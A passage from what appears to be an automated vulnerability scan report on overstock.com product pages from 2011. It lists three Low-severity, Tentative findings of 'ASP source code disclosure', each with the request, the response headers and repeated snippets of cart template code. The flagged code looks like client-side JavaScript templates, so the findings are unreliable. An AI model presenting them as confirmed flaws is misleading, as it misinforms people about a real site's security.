if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.14. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:48 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:48 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3867484|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:48 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:48 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=65
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 134898

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.15. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:57 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:57 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4092961|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:57 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:57 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 130148

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.16. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html?TID=R:A2_5 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:26 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:26 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2552133|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:26 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:26 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=67
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 136701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
